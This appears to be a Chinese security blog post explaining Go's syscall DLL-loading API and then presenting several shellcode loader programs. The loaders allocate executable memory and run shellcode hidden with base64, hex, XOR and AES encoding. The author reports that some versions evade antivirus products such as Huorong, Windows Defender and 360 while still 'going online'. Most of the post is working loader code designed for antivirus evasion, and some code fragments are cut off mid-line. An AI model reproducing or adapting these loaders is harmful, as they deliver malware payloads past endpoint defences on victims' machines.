syscall包 包含一个到低级操作系统原语的接口。我们将要用这个包里的方法去实现DLL的调用,但是里面的DLL调用方法有多个,这里分别测试下调用的区别。
func loadlibrary(filename *uint16) (handle uintptr, err Errno)
DLL 实现对单个 DLL 的访问。
type DLL struct {
Name string // DLL名称
Handle Handle // DLL句柄
LoadDLL 将命名的 DLL 文件加载到内存中。如果 name 不是绝对路径并且不是 Go 使用的已知系统 DLL,Windows 将在许多位置搜索命名的 DLL,从而导致潜在的 DLL 预加载攻击。使用 golang.org/x/sys/windows中的 LazyDLL 以安全的方式加载系统 DLL。
看以上官方文档的意思,LoadDLL此方法可能存在安全隐患,但是对于我们调用shellcode来讲并不需要从目标机器的安全进行考虑,如果想用安全的方法就去安装官方文档推荐的包:go get -u golang.org/x/sys/windows
func LoadDLL(name string ) (* DLL , error )
func LoadDLL(name string) (*DLL, error) {
namep, err := UTF16PtrFromString(name)
if err != nil {
return nil, err
var h uintptr
var e Errno
if sysdll.IsSystemDLL[name] {
absoluteFilepathp, err := UTF16PtrFromString(systemDirectoryPrefix + name)
if err != nil {
return nil, err
h, e = loadsystemlibrary(namep, absoluteFilepathp)
} else {
h, e = loadlibrary(namep)
if e != 0 {
return nil, &DLLError{
Err: e,
ObjName: name,
Msg: "Failed to load " + name + ": " + e.Error(),
d := &DLL{
Name: name,
Handle: Handle(h),
return d, nil
MustLoadDLL 与 LoadDLL 类似,但如果加载操作失败,则会触发panic异常。
func MustLoadDLL(name string) *DLL
func MustLoadDLL(name string) *DLL {
d, e := LoadDLL(name)
if e != nil {
return d
LazyDLL 实现对单个 DLL 的访问。 它将延迟 DLL 的加载,直到第一次调用其 Handle 方法或其 LazyProc 的 Addr 方法之一。LazyDLL 受到与 LoadDLL 中记录的相同的 DLL 预加载攻击。使用 golang.org/x/sys/windows 中的 LazyDLL 以安全的方式加载系统 DLL。
type LazyDLL struct {
Name string
// 包含过滤或未导出的字段
NewLazyDLL 创建与 DLL 文件关联的新 LazyDLL。
func NewLazyDLL(name string) *LazyDLL
func NewLazyDLL(name string) *LazyDLL {
return &LazyDLL{Name: name}
func getprocaddress(handle uintptr, procname *uint8) (proc uintptr, err Errno)
type Proc struct {
Dll *DLL
Name string
addr uintptr
FindProc 在 DLL d 中搜索名为 name 的过程并返回 *Proc ,如果找到。 如果搜索失败,则返回错误。 翻译过来就是获取函数的地址
func (d *DLL) FindProc(name string) (proc *Proc, err error)
func (d *DLL) FindProc(name string) (proc *Proc, err error) {
namep, err := BytePtrFromString(name)
if err != nil {
return nil, err
a, e := getprocaddress(uintptr(d.Handle), namep)
if e != 0 {
return nil, &DLLError{
Err: e,
ObjName: name,
Msg: "Failed to find " + name + " procedure in " + d.Name + ": " + e.Error(),
p := &Proc{
Dll: d,
Name: name,
addr: a,
return p, nil
MustFindProc 与 FindProc 类似,但如果搜索失败,则会出现panic异常。
func (d *DLL) MustFindProc(name string) *Proc
func (d *DLL) MustFindProc(name string) *Proc {
p, e := d.FindProc(name)
if e != nil {
return p
type LazyProc struct {
mu sync.Mutex
Name string
l *LazyDLL
proc *Proc
NewProc 返回一个 LazyProc 用于访问 DLL 中的命名过程 d.
func (d *LazyDLL) NewProc(name string) *LazyProc
func SyscallN(trap uintptr, args ...uintptr) (r1, r2 uintptr, err Errno)
func (p *Proc) Call(a ...uintptr) (uintptr, uintptr, error)
func (p *Proc) Call(a ...uintptr) (uintptr, uintptr, error) {
return SyscallN(p.Addr(), a...)
func (p *LazyProc) Call(a ...uintptr) (r1, r2 uintptr, lastErr error)
func (p *LazyProc) Call(a ...uintptr) (r1, r2 uintptr, lastErr error) {
return p.proc.Call(a...)
golang运行隐藏黑框方法:go build -ldflags="-H windowsgui" xxx.go
// https://pkg.go.dev/cmd/link
-H type
Set executable format type.
The default format is inferred from GOOS and GOARCH.
On Windows, -H windowsgui writes a "GUI binary" instead of a "console binary."
time: 2022-04-24 2:00
file: main.go
package main
import (
const (
提交物理内存 = 0x1000 // Mem_Commit
保留线性地址 = 0x2000 // Mem_Reserve
内存页可读可写可执行 = 0x40 // Page_Execute_ReadWrite
var (
Kernel32, _ = syscall.LoadLibrary("Kernel32.dll")
创建线程, _ = syscall.GetProcAddress(Kernel32, "CreateThread")
申请虚拟内存, _ = syscall.GetProcAddress(Kernel32, "VirtualAlloc")
内存复制, _ = syscall.GetProcAddress(Kernel32, "RtlMoveMemory")
线程等待,_ = syscall.GetProcAddress(Kernel32, "WaitForSingleObject")
函数调用 = syscall.SyscallN
func main() {
buf := []byte("üH...")
lpMem, _, _ := 函数调用(申请虚拟内存, uintptr(0), uintptr(len(buf)), 提交物理内存|保留线性地址, 内存页可读可写可执行)
_, _, _ = 函数调用(内存复制, lpMem, uintptr(unsafe.Pointer(&buf[0])), uintptr(len(buf)))
// 1. 创建线程的方式执行shellcode
hThread, _, _ := 函数调用(创建线程, 0, 0, lpMem, 0, 0, 0)
_,_,_ = 函数调用(线程等待,hThread,uintptr(0xffff))
// 2. 直接用syscall调用shellcode
// 函数调用(lpMem)
// 释放Kernel32.dll
_ = syscall.FreeLibrary(Kernel32)
// golang base64加解密
package main
import (
func main(){
// 加密
buf := []byte("üH\...")
enc := base64.StdEncoding.EncodeToString(buf)
// 解密
dec, _ := base64.StdEncoding.DecodeString(enc)
time: 2022-04-24 2:00
file: main.go
package main
import (
const (
提交物理内存 = 0x1000 // Mem_Commit
保留线性地址 = 0x2000 // Mem_Reserve
内存页可读可写可执行 = 0x40 // Page_Execute_ReadWrite
var (
Kernel32, _ = syscall.LoadLibrary("Kernel32.dll")
创建线程, _ = syscall.GetProcAddress(Kernel32, "CreateThread")
申请虚拟内存, _ = syscall.GetProcAddress(Kernel32, "VirtualAlloc")
内存复制, _ = syscall.GetProcAddress(Kernel32, "RtlMoveMemory")
线程等待,_ = syscall.GetProcAddress(Kernel32, "WaitForSingleObject")
函数调用 = syscall.SyscallN
func main() {
buf, _ := base64.StdEncoding.DecodeString("/EiD5PDoyA...GWmgjQ==")
lpMem, _, _ := 函数调用(申请虚拟内存, uintptr(0), uintptr(len(buf)), 提交物理内存|保留线性地址, 内存页可读可写可执行)
_, _, _ = 函数调用(内存复制, lpMem, uintptr(unsafe.Pointer(&buf[0])), uintptr(len(buf)))
hThread, _, _ := 函数调用(创建线程, 0, 0, lpMem, 0, 0, 0)
_,_,_ = 函数调用(线程等待,hThread,uintptr(0xffffffff))
_ = syscall.FreeLibrary(Kernel32)
代码b64加密过后,编译火绒不报毒,正常上线执行指令且吊打火绒,Server 2016 Windows Derfender,测试无法过360。
time: 2022-04-24 2:00
file: main.go
package main
import (
const (
提交物理内存 = 0x1000 // Mem_Commit
保留线性地址 = 0x2000 // Mem_Reserve
内存页可读可写可执行 = 0x40 // Page_Execute_ReadWrite
var (
Kernel32, _ = syscall.LoadLibrary("Kernel32.dll")
创建线程, _ = syscall.GetProcAddress(Kernel32, "CreateThread")
申请虚拟内存, _ = syscall.GetProcAddress(Kernel32, "VirtualAlloc")
内存复制, _ = syscall.GetProcAddress(Kernel32, "RtlMoveMemory")
线程等待,_ = syscall.GetProcAddress(Kernel32, "WaitForSingleObject")
函数调用 = syscall.SyscallN
func main() {
// 接收终端参数,懂得都懂
b64 := os.Args[1]
buf, _ := base64.StdEncoding.DecodeString(b64)
lpMem, _, _ := 函数调用(申请虚拟内存, uintptr(0), uintptr(len(buf)), 提交物理内存|保留线性地址, 内存页可读可写可执行)
_, _, _ = 函数调用(内存复制, lpMem, uintptr(unsafe.Pointer(&buf[0])), uintptr(len(buf)))
hThread, _, _ := 函数调用(创建线程, 0, 0, lpMem, 0, 0, 0)
_,_,_ = 函数调用(线程等待,hThread,uintptr(0xffffffff))
_ = syscall.FreeLibrary(Kernel32)
time: 2022-04-24 2:00
file: main.go
package main
import (
const (
提交物理内存 = 0x1000 // Mem_Commit
保留线性地址 = 0x2000 // Mem_Reserve
内存页可读可写可执行 = 0x40 // Page_Execute_ReadWrite
var (
Kernel32, _ = syscall.LoadDLL("Kernel32.dll")
创建线程, _ = Kernel32.FindProc("CreateThread")
申请虚拟内存, _ = Kernel32.FindProc( "VirtualAlloc")
内存复制, _ = Kernel32.FindProc( "RtlMoveMemory")
线程等待,_ = Kernel32.FindProc( "WaitForSingleObject")
func main() {
buf := []byte{206,122,177,...}
for i:=0;i
编译火绒不报毒且正常执行指令,360,server 2016 defender检测不报毒,上线应该没问题,不测了。
// hex加解密
package main
import (
func main() {
// hex加密
enc := hex.EncodeToString(buf)
// hex解密
dec,_ := hex.DecodeString(enc)
time: 2022-04-24 2:00
file: main.go
package main
import (
const (
提交物理内存 = 0x1000 // Mem_Commit
保留线性地址 = 0x2000 // Mem_Reserve
内存页可读可写可执行 = 0x40 // Page_Execute_ReadWrite
var (
Kernel32, _ = syscall.LoadDLL("Kernel32.dll")
创建线程, _ = Kernel32.FindProc("CreateThread")
申请虚拟内存, _ = Kernel32.FindProc( "VirtualAlloc")
内存复制, _ = Kernel32.FindProc( "RtlMoveMemory")
线程等待,_ = Kernel32.FindProc( "WaitForSingleObject")
func main() {
HEX := os.Args[1]
buf,_ := hex.DecodeString(HEX)
lpMem, _, _ := 申请虚拟内存.Call( uintptr(0), uintptr(len(buf)), 提交物理内存|保留线性地址, 内存页可读可写可执行)
_,_,_ = 内存复制.Call(lpMem, uintptr(unsafe.Pointer(&buf[0])), uintptr(len(buf)))
_,_,_ = syscall.SyscallN(lpMem)
_ = Kernel32.Release()
time: 2022-04-24 2:00
file: main.go
package main
import (
const (
提交物理内存 = 0x1000 // Mem_Commit
保留线性地址 = 0x2000 // Mem_Reserve
内存页可读可写可执行 = 0x40 // Page_Execute_ReadWrite
var (
Kernel32 = syscall.MustLoadDLL("Kernel32.dll")
创建线程 = Kernel32.MustFindProc("CreateThread")
申请虚拟内存 = Kernel32.MustFindProc("VirtualAlloc")
内存复制 = Kernel32.MustFindProc("RtlMoveMemory")
线程等待 = Kernel32.MustFindProc("WaitForSingleObject")
func main() {
buf := []byte{206,122,177...}
for i:=0;i
// Aes CBC模式加解密
time: 2022-04-24 2:00
file: main.go
package main
import (
// 位数填充
func pkcs5Padding(ciphertext []byte, blockSize int) []byte {
padding := blockSize - len(ciphertext)%blockSize
padtext := bytes.Repeat([]byte{byte(padding)}, padding)
return append(ciphertext, padtext...)
func pkcs5UnPadding(origData []byte) []byte {
length := len(origData)
unpadding := int(origData[length-1])
return origData[:(length - unpadding)]
func AesDecryptCBC(encrypted []byte, key []byte) (decrypted []byte) {
block, _ := aes.NewCipher(key) // 分组秘钥
blockSize := block.BlockSize() // 获取秘钥块的长度
blockMode := cipher.NewCBCDecrypter(block, key[:blockSize]) // 加密模式
decrypted = make([]byte, len(encrypted)) // 创建数组
blockMode.CryptBlocks(decrypted, encrypted) // 解密
decrypted = pkcs5UnPadding(decrypted) // 去除补全码
return decrypted
func AesEncryptCBC(origData []byte, key []byte) (encrypted []byte) {
// 分组秘钥
// NewCipher该函数限制了输入k的长度必须为16, 24或者32
block, _ := aes.NewCipher(key)
blockSize := block.BlockSize() // 获取秘钥块的长度
origData = pkcs5Padding(origData, blockSize) // 补全码
blockMode := cipher.NewCBCEncrypter(block, key[:blockSize]) // 加密模式
encrypted = make([]byte, len(origData)) // 创建数组
blockMode.CryptBlocks(encrypted, origData) // 加密
return encrypted
func main() {
buf := []byte("üH...")
// 加密
key := []byte("0123456789123456")
enc := AesEncryptCBC(buf,key)
dst := make([]byte,2048)
n := hex.Encode(dst,enc)
// 解密
enc,_ = hex.DecodeString(string(dst[:n]))
dec := AesDecryptCBC(enc,key)
time: 2022-04-24 2:00
file: main.go
Author: ILU
package main
import (
const (
提交物理内存 = 0x1000 // Mem_Commit
保留线性地址 = 0x2000 // Mem_Reserve
内存页可读可写可执行 = 0x40 // Page_Execute_ReadWrite
var (
Kernel32 = syscall.MustLoadDLL("Kernel32.dll")
创建线程 = Kernel32.MustFindProc("CreateThread")
申请虚拟内存 = Kernel32.MustFindProc("VirtualAlloc")
内存复制 = Kernel32.MustFindProc("RtlMoveMemory")
线程等待 = Kernel32.MustFindProc("WaitForSingleObject")
// 位数填充
func pkcs5Padding(ciphertext []byte, blockSize int) []byte {
padding := blockSize - len(ciphertext)%blockSize
padtext := bytes.Repeat([]byte{byte(padding)}, padding)
return append(ciphertext, padtext...)
func pkcs5UnPadding(origData []byte) []byte {
length := len(origData)
unpadding := int(origData[length-1])
return origData[:(length - unpadding)]
func AesDecryptCBC(encrypted []byte, key []byte) (decrypted []byte) {
block, _ := aes.NewCipher(key) // 分组秘钥
blockSize := block.BlockSize() // 获取秘钥块的长度
blockMode := cipher.NewCBCDecrypter(block, key[:blockSize]) // 加密模式
decrypted = make([]byte, len(encrypted)) // 创建数组
blockMode.CryptBlocks(decrypted, encrypted) // 解密
decrypted = pkcs5UnPadding(decrypted) // 去除补全码
return decrypted
func AesEncryptCBC(origData []byte, key []byte) (encrypted []byte) {
// 分组秘钥
// NewCipher该函数限制了输入k的长度必须为16, 24或者32
block, _ := aes.NewCipher(key)
blockSize := block.BlockSize() // 获取秘钥块的长度
origData = pkcs5Padding(origData, blockSize) // 补全码
blockMode := cipher.NewCBCEncrypter(block, key[:blockSize]) // 加密模式
encrypted = make([]byte, len(origData)) // 创建数组
blockMode.CryptBlocks(encrypted, origData) // 加密
return encrypted
func main() {
// 解密
dst := os.Args[1]
enc,_ := hex.DecodeString(dst)
buf := AesDecryptCBC(enc,key)
lpMem, _, _ := 申请虚拟内存.Call(uintptr(0), uintptr(len(buf)), 提交物理内存|保留线性地址, 内存页可读可写可执行)
_, _, _ = 内存复制.Call(lpMem, uintptr(unsafe.Pointer(&buf[0])), uintptr(len(buf)))
_, _, _ = syscall.SyscallN(lpMem)
_ = Kernel32.Release()
time: 2022-04-24 2:00
file: main.go
package main
import (
const (
提交物理内存 = 0x1000 // Mem_Commit
保留线性地址 = 0x2000 // Mem_Reserve
内存页可读可写可执行 = 0x40 // Page_Execute_ReadWrite
var (
Kernel32 = syscall.NewLazyDLL("Kernel32.dll")
创建线程 = Kernel32.NewProc("CreateThread")
申请虚拟内存 = Kernel32.NewProc("VirtualAlloc")
内存复制 = Kernel32.NewProc("RtlMoveMemory")
线程等待 = Kernel32.NewProc("WaitForSingleObject")
func main() {
buf := []byte{206, 122, 177...}
for i := 0; i < len(buf); i++ {
buf[i] ^= 50
lpMem, _, _ := 申请虚拟内存.Call(uintptr(0), uintptr(len(buf)), 提交物理内存|保留线性地址, 内存页可读可写可执行)
_, _, _ = 内存复制.Call(lpMem, uintptr(unsafe.Pointer(&buf[0])), uintptr(len(buf)))
_, _, _ = syscall.SyscallN(lpMem)
申明:本文仅供技术交流,请自觉遵守网络安全相关法律法规,切勿利用文章内的相关技术从事非法活动,如因此产生的一切不良后果与文章作者无关 本文原创作者:ILU
